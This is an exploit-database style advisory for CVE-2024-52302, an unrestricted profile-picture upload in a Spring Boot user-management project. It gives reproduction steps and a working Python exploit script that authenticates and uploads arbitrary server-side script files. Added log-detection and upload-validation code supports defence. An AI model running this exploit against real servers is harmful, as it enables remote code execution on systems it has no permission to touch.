Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)

Published: 15 Apr 2025 00:00:00 · Reported by: d3sca · Type: exploitdb · Source: www.exploit-db.com · 302 views

Unrestricted file upload in Spring Boot allows Remote Code Execution via malicious file uploads.
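From the defender's side, the exploitation chain described on this page leaves a recognisable footprint in web access logs: a successful PUT or POST to /api/v1/customer/profile-picture, a GET to /api/v1/customer/my-profile, and then a GET from the same client for a stored file whose extension is not an image type. The following detection logic is an added example, not part of the advisory or of the vulnerable project. It assumes combined-format access logs; the sample lines, the client addresses and the /uploads/ storage path are constructed for the example (the advisory does not state where uploaded files are stored).

```python
"""Flag the upload -> profile lookup -> fetch-of-non-image sequence in access logs.

Added detection example for the unrestricted profile-picture upload described
on this page. Endpoint paths come from the advisory; the log lines, client
addresses and the /uploads/ storage path are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

UPLOAD_PATH = "/api/v1/customer/profile-picture"   # from the advisory
PROFILE_PATH = "/api/v1/customer/my-profile"        # from the advisory
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".webp"}
WINDOW = timedelta(minutes=5)  # how long after an upload we correlate follow-up requests

# Constructed sample log: one client fetches a .jsp after uploading, one fetches a .png
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Nov/2024:10:00:01 +0000] "POST /api/v1/user/login HTTP/1.1" 200 312',
    '10.0.0.5 - - [14/Nov/2024:10:00:04 +0000] "PUT /api/v1/customer/profile-picture HTTP/1.1" 200 128',
    '10.0.0.5 - - [14/Nov/2024:10:00:06 +0000] "GET /api/v1/customer/my-profile HTTP/1.1" 200 540',
    '10.0.0.5 - - [14/Nov/2024:10:00:09 +0000] "GET /uploads/7f3a.jsp HTTP/1.1" 200 88',
    '10.0.0.9 - - [14/Nov/2024:10:02:00 +0000] "PUT /api/v1/customer/profile-picture HTTP/1.1" 200 128',
    '10.0.0.9 - - [14/Nov/2024:10:02:03 +0000] "GET /api/v1/customer/my-profile HTTP/1.1" 200 540',
    '10.0.0.9 - - [14/Nov/2024:10:02:05 +0000] "GET /uploads/b21c.png HTTP/1.1" 200 20480',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def _ext(path):
    """Lower-cased extension of the last path segment, ignoring any query string."""
    base = path.split("?", 1)[0].rsplit("/", 1)[-1]
    return "." + base.rsplit(".", 1)[1].lower() if "." in base else ""


def find_suspicious_sequences(lines):
    """Return one alert per successful upload that is followed, within WINDOW and from
    the same client, by a profile lookup and a 200 GET of a non-image file."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        uploads = [e for e in evs
                   if e["method"] in ("PUT", "POST") and e["path"] == UPLOAD_PATH
                   and 200 <= e["status"] < 300]
        for up in uploads:
            later = [e for e in evs if up["ts"] <= e["ts"] <= up["ts"] + WINDOW]
            looked_up = any(e["method"] == "GET" and e["path"] == PROFILE_PATH for e in later)
            fetched = [e["path"] for e in later
                       if e["method"] == "GET" and e["status"] == 200
                       and _ext(e["path"]) and _ext(e["path"]) not in IMAGE_EXTS]
            if looked_up and fetched:
                alerts.append({"ip": ip, "upload_at": up["ts"].isoformat(), "fetched": fetched})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_sequences(SAMPLE_LOG):
        print("[ALERT] possible upload-to-execution chain:", alert)
```

The rule deliberately keys on the sequence rather than on any single request, because a profile-picture upload on its own is normal traffic; a 200 response for a stored file with a non-image extension is the part that should never happen when the upload handler is doing its job.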

Code
# Exploit Title: Unrestricted File Upload
# Google Dork:
# Date: 14/Nov/2024
# Exploit Author: d3sca
# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
# Version: [app version] 0.1
# Tested on: Debian Linux
# CVE : CVE-2024-52302


# Steps to Reproduce:

# Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture as a customer account with roles 26,17 added, carrying a malicious file payload (e.g., .jsp, .php, .html).

# GET the file location: Send a GET request to /api/v1/customer/my-profile and grab the file location from the profile's link in the response.

# Execute the Uploaded File: Using the file name, access the file directly through the URL returned in the response.
# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution.


import requests
import argparse
import sys


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def login(url, username, password):
    """Authenticate with the API and return the Bearer token."""
    login_endpoint = f"{url}/api/v1/user/login"
    headers = {"Content-Type": "application/json"}
    payload = {
        "username": username,
        "password": password
    }

    try:
        response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)
        response.raise_for_status()

        # Extract token
        token = response.json().get("token")
        if not token:
            print("[!] Token not found in response. Exiting.")
            sys.exit(1)

        print("[+] Authentication successful. Token acquired.")
        return token
    except Exception as e:
        print(f"[!] Login failed: {e}")
        sys.exit(1)

def upload_file(url, token, file_path):
    """Upload a file to the profile picture endpoint using the Bearer token."""
    upload_endpoint = f"{url}/api/v1/customer/profile-picture"
    headers = {
        "Authorization": f"Bearer {token}"
    }

    try:
        # Open inside a context manager so the handle is closed after the request.
        # Note: the reproduction steps above describe a PUT request; the script as
        # published sends POST.
        with open(file_path, "rb") as fh:
            files = {"file": fh}
            response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)
        response.raise_for_status()

        if response.status_code == 200:
            print("[+] File uploaded successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[!] Failed to upload file. Status code: {response.status_code}")
            print(f"[!] Response: {response.text}")
    except Exception as e:
        print(f"[!] File upload failed: {e}")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.")
    parser.add_argument("-u", "--username", required=True, help="Username for login")
    parser.add_argument("-p", "--password", required=True, help="Password for login")
    parser.add_argument("-f", "--file", required=True, help="File to upload")
    parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)")

    args = parser.parse_args()

    # Authenticate 
    token = login(args.url, args.username, args.password)

    # Upload the file
    upload_file(args.url, token, args.file)

if __name__ == "__main__":
    main()
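The root cause is that the profile-picture endpoint accepts whatever file the client sends and later serves it back under a URL the client can discover. The checks below are an added example of what the server side should do instead; they are not code from the advisory or from the Java-springboot-codebase project, and the allowed types, size limit and storage directory are assumptions for the example. The same checks map directly onto a Spring MultipartFile handler: the declared Content-Type and original filename are client-controlled and are used only as hints, the bytes are sniffed for an image signature, and the stored name is chosen by the server.

```python
"""Server-side validation for a profile-picture upload.

Added example of the hardening this advisory implies; not the vulnerable
project's code. Allowed types, the size limit and the storage directory are
assumptions for the example.
"""
import os
import secrets

# Allow-list: extension -> magic-byte prefixes that a genuine file of that type starts with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed upper bound for a profile picture


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message says which check failed."""


def validate_profile_picture(original_name: str, data: bytes) -> str:
    """Return a server-chosen filename if the upload is acceptable, otherwise raise.

    The client-supplied name is used only to read the declared extension; it never
    reaches the filesystem or a URL. The declared Content-Type header is ignored
    entirely because the client controls it.
    """
    if len(data) == 0 or len(data) > MAX_BYTES:
        raise UploadRejected("size out of range")

    # Keep only the basename so path components like ../ cannot influence the result.
    base = os.path.basename(original_name.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")

    # The content must actually look like the declared image type; a script with a
    # .png name does not start with the PNG signature.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("content does not match declared image type")

    # Random server-side name: the caller cannot choose or predict where the file lands.
    return secrets.token_hex(16) + ext


def is_acceptable(original_name: str, data: bytes) -> bool:
    """Boolean wrapper around validate_profile_picture for callers that only need yes/no."""
    try:
        validate_profile_picture(original_name, data)
        return True
    except UploadRejected:
        return False


def store_profile_picture(original_name: str, data: bytes, storage_dir: str) -> str:
    """Validate, then write under a server-chosen name. storage_dir is assumed to be
    outside any directory the servlet container serves or executes from."""
    name = validate_profile_picture(original_name, data)
    with open(os.path.join(storage_dir, name), "wb") as fh:
        fh.write(data)
    return name


# Constructed sample inputs for demonstration (not real uploads).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SAMPLE_SCRIPT = b"<%= 1 + 1 %>"  # harmless placeholder for a server-side script body

if __name__ == "__main__":
    for name, data in [("me.png", SAMPLE_PNG), ("shell.jsp", SAMPLE_SCRIPT),
                       ("shell.png", SAMPLE_SCRIPT), ("../../x.png", SAMPLE_PNG)]:
        try:
            print(f"{name!r}: accepted as {validate_profile_picture(name, data)}")
        except UploadRejected as err:
            print(f"{name!r}: rejected ({err})")
```

Serving the stored file back through a controller that sets an explicit image Content-Type, rather than mapping the storage directory as static or executable web content, closes the remaining gap: even if a check were bypassed, the container would never be asked to execute what it stored.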

Scores (current as of 15 Apr 2025 00:00): Vulners AI Score 6.8 (Medium risk) · CVSS 4: 8.7 · EPSS: 0.07457